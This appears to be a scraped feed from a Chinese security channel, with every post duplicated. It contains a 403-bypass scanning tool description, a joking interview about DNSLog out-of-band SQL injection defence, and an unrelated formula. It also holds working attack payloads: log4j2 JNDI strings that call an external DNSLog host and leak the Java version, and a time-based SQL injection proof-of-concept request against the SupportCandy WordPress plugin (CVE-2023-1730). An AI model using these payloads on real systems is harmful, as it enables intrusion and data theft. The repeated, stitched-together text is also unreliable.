目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别
运行流程
dirsearch进行目录扫描--->将所有403状态的目录进行保存-->是否进行jsfind-->是(进行js爬取url和域名,将爬取到的url进行状态码识别如果是403状态则进行保存)-->进行403绕过-->目录进行指纹识别
原文地址:https://github.com/lemonlove7/dirsearch_bypass403
运行流程
dirsearch进行目录扫描--->将所有403状态的目录进行保存-->是否进行jsfind-->是(进行js爬取url和域名,将爬取到的url进行状态码识别如果是403状态则进行保存)-->进行403绕过-->目录进行指纹识别
原文地址:https://github.com/lemonlove7/dirsearch_bypass403
f(x) = ((((5 + x) φ)/(10 (x + ϕ))) + (0.7 + 0.08φ) (5 + x)) (0.7 - 0.002φ^(1.2)) * 1.1
导入几何画板绘制函数图像有惊喜,study match棍哥😋
导入几何画板绘制函数图像有惊喜,study match棍哥😋
面试官:请问一下对于使用dnslog来进行OOB带外数据sql注入你的防范思路。
A厂/B厂员工:禁用数据库load_file()函数和让secure_file_priv为null
(规范而经典的教科书式回答)
C厂员工:限制所有协议都不允许出网
面试官:太粗暴了,万一正常用户使用时需要协议出网呢?
C厂员工:写一个态感的规则,当出网的目标url是DNSLog.cn这种网站的时候就不放行
面试官:好思路,那么请你写一下这个态感规则的具体代码。
C厂员工:我不知道
面试官:……
C厂员工:没什么我还有个好思路,直接上tg找至尊一梭子ddos把dnslog网站给打了
(新奇又好像有点逼道理的各种思路,然后极其贫乏的代码能力)
B厂员工:我知道那个态感的demo怎么写,$url = $_SERVER['HTTP_HOST'].……
面试官:你说得对你这个demo把dnslog注入防住了,结果你第一行代码自己就出了http路径遍历漏洞
(B和A的区别就是典中典之做安全加固修漏洞结果加固的补丁自己又出漏洞)
D厂员工:花钱买waf过滤了就行,管他什么注入
面试官:钱呢?
D厂员工:免费的waf啊
面试官:有等保要求这些万一能用的设备只有付费版的呢?
D厂员工:找上面报账啊
(富哥)
E厂员工:针对这种问题,直接限制所有协议不出网是不对的……
面试官:嗯嗯
E厂员工:做一个会员系统,每个月充值29.9,开了会员就让他协议出网,不开会员不许出
(最中国特色的一集)
A厂/B厂员工:禁用数据库load_file()函数和让secure_file_priv为null
(规范而经典的教科书式回答)
C厂员工:限制所有协议都不允许出网
面试官:太粗暴了,万一正常用户使用时需要协议出网呢?
C厂员工:写一个态感的规则,当出网的目标url是DNSLog.cn这种网站的时候就不放行
面试官:好思路,那么请你写一下这个态感规则的具体代码。
C厂员工:我不知道
面试官:……
C厂员工:没什么我还有个好思路,直接上tg找至尊一梭子ddos把dnslog网站给打了
(新奇又好像有点逼道理的各种思路,然后极其贫乏的代码能力)
B厂员工:我知道那个态感的demo怎么写,$url = $_SERVER['HTTP_HOST'].……
面试官:你说得对你这个demo把dnslog注入防住了,结果你第一行代码自己就出了http路径遍历漏洞
(B和A的区别就是典中典之做安全加固修漏洞结果加固的补丁自己又出漏洞)
D厂员工:花钱买waf过滤了就行,管他什么注入
面试官:钱呢?
D厂员工:免费的waf啊
面试官:有等保要求这些万一能用的设备只有付费版的呢?
D厂员工:找上面报账啊
(富哥)
E厂员工:针对这种问题,直接限制所有协议不出网是不对的……
面试官:嗯嗯
E厂员工:做一个会员系统,每个月充值29.9,开了会员就让他协议出网,不开会员不许出
(最中国特色的一集)
👍1
关于log4j2漏洞的利用,今天下午江户川遇到的问题
测试最简单的原版${jndi:ldap://a496eb671c.ipv6.1433.eu.org} ,去dnslog网站看一眼,诶,收到回显了。然后加上命令参数,比如先看一眼java版本,输入${jndi:ldap://a496eb671c.${java:version}.ipv6.1433.eu.org},在dnslog网站怎么都收不到回显
造成这种情况的原因挺多,自己懒狗运维不看日志的MessageConverter默认关了有可能,他的嵌套调用做了replace截取字段不一样有可能,等你自己去fuzz路径到死。最恶俗的装了waf过滤jndi高危执行也有可能……情况很多
然后我没想到的是其实是${java:version}这个测试的命令出了问题,因为测试命令换成${jndi:ldap://a496eb671c.ipv6.1433.eu.org/calc},就收到回显了(离谱)。想了一下应该是Log4j2解析参数里的占位符把{java:version}换成版本号输出的时候,版本号里面带.这玩意,你看着是版本号里的一个点,其实人家的作用还有作配置文件中的变量替换,马上又递归解析为子协议。因为log4j2漏洞的原理就是JndiLookup里面那几个杂七杂八的解释器获取一堆转换器名称最后触发Logger.error(),我自己脑子里反正是没搞清楚后续怎么一个流程,很复杂,结论就是你java:version带占位符继续会触发一堆杂七杂八的玩意,反正触发不了jndi注入
测试最简单的原版${jndi:ldap://a496eb671c.ipv6.1433.eu.org} ,去dnslog网站看一眼,诶,收到回显了。然后加上命令参数,比如先看一眼java版本,输入${jndi:ldap://a496eb671c.${java:version}.ipv6.1433.eu.org},在dnslog网站怎么都收不到回显
造成这种情况的原因挺多,自己懒狗运维不看日志的MessageConverter默认关了有可能,他的嵌套调用做了replace截取字段不一样有可能,等你自己去fuzz路径到死。最恶俗的装了waf过滤jndi高危执行也有可能……情况很多
然后我没想到的是其实是${java:version}这个测试的命令出了问题,因为测试命令换成${jndi:ldap://a496eb671c.ipv6.1433.eu.org/calc},就收到回显了(离谱)。想了一下应该是Log4j2解析参数里的占位符把{java:version}换成版本号输出的时候,版本号里面带.这玩意,你看着是版本号里的一个点,其实人家的作用还有作配置文件中的变量替换,马上又递归解析为子协议。因为log4j2漏洞的原理就是JndiLookup里面那几个杂七杂八的解释器获取一堆转换器名称最后触发Logger.error(),我自己脑子里反正是没搞清楚后续怎么一个流程,很复杂,结论就是你java:version带占位符继续会触发一堆杂七杂八的玩意,反正触发不了jndi注入
👍6👎3
WordPress plugin SupportCandy SQL注入漏洞POC(CVE-2023-1730)
GET / HTTP 1.1Host:127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeCookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}Accept-Encoding: gzip
GET / HTTP 1.1Host:127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeCookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}Accept-Encoding: gzip
❤1